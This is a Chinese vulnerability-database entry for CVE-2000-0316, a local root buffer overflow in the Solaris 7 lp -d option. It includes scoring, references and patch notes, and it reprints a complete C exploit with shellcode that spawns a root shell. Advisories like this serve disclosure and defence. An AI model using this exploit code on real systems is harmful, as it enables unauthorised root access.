CVE-2000-0316
CVSS7.2
发布时间 :2000-04-24 00:00:00
修订时间 :2008-09-10 15:04:04
NMCOE    

[原文]Buffer overflow in Solaris 7 lp allows local users to gain root privileges via a long -d option.


[CNNVD]Solaris lp -d 选项缓冲区溢出漏洞(CNNVD-200004-070)

        Solaris 7 lp存在缓冲区溢出漏洞,本地用户可以通过超长-d选项获取根用户权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0316
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0316
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-070
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1143
(UNKNOWN)  BID  1143
http://archives.neohapsis.com/archives/bugtraq/2000-04/0191.html
(UNKNOWN)  BUGTRAQ  20000424 Solaris 7 x86 lp exploit

- 漏洞信息

Solaris lp -d 选项缓冲区溢出漏洞
高危 缓冲区溢出
2000-04-24 00:00:00 2005-05-02 00:00:00
本地  
        Solaris 7 lp存在缓冲区溢出漏洞,本地用户可以通过超长-d选项获取根用户权限。

- 公告与补丁

        Removal of the setuid bit will eliminate this vulnerability, but will prevent printing from working properly.
        Sun Solaris 2.6
        
        Sun Solaris 2.6 _x86
        
        Sun Solaris 7.0 _x86
        
        Sun Solaris 7.0
        

- 漏洞信息 (19878)

Solaris 2.6/7.0 lp -d Option Buffer Overflow Vulnerability (EDBID:19878)
solaris local
2000-04-24 Verified
0 DiGiT
N/A [点击下载]
source: http://www.securityfocus.com/bid/1143/info

A buffer overrun has been discovered in the lp program, as included with Sun's Solaris 7 operating system. By passing well crafted, machine executable code of sufficient length to the -d option of lp, it becomes possible to execute arbitrary code as root.

/*      
 *      
 * solaris 2.7 /usr/bin/lp local exploit, i386.
 *
 * discovered by DiGiT.
 * try offset 150-250 if sploit fails
 *
 * greets: #!ADM, #!security.is, #hax, duke
 *
 * DiGiT - teddi@linux.is 
 *
 */

#include <stdio.h>
#include <stdlib.h> 


char shellcode[] =
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  
#define BUFSIZE  1100  
 
long get_esp() { __asm__("movl %esp,%eax"); }
 
int main(int argc, char *argv[]) {
 
  char buff[BUFSIZE];
  int nopcount=501, offset=260;
  int i;

  if (argc > 1) offset = atoi(argv[1]);
  if (argc > 2) nopcount  = atoi(argv[2]);

        memset (buff, 0x90, BUFSIZE);
 
                for (i = nopcount; i < BUFSIZE - 4; i += 4)
                *(long *) &buff[i] = get_esp() + offset;
        memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
        (shellcode));
 
            memcpy (buff, ":", 1);
            printf("Addr = 0x%x\n", get_esp() + offset);
         execl("/usr/bin/lp", "lp", "-d", buff, "-p", "/tmp/ps_data",NULL);
}		

- 漏洞信息

1296
Solaris lp -d Option Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

A local overflow exists in Solaris. The 'lp' binary fails to perform proper bounds checking resulting in a buffer overflow. By passing an overly long argument to the '-d' option, a malicious user can gain root privileges resulting in a loss of integrity.

- 时间线

2000-04-24 Unknow
2000-04-24 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun Microsystems has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站